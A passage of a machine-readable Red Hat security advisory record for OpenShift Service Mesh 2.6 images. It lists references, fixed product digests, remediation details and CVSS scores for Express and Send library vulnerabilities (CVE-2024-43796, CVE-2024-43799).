"https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", 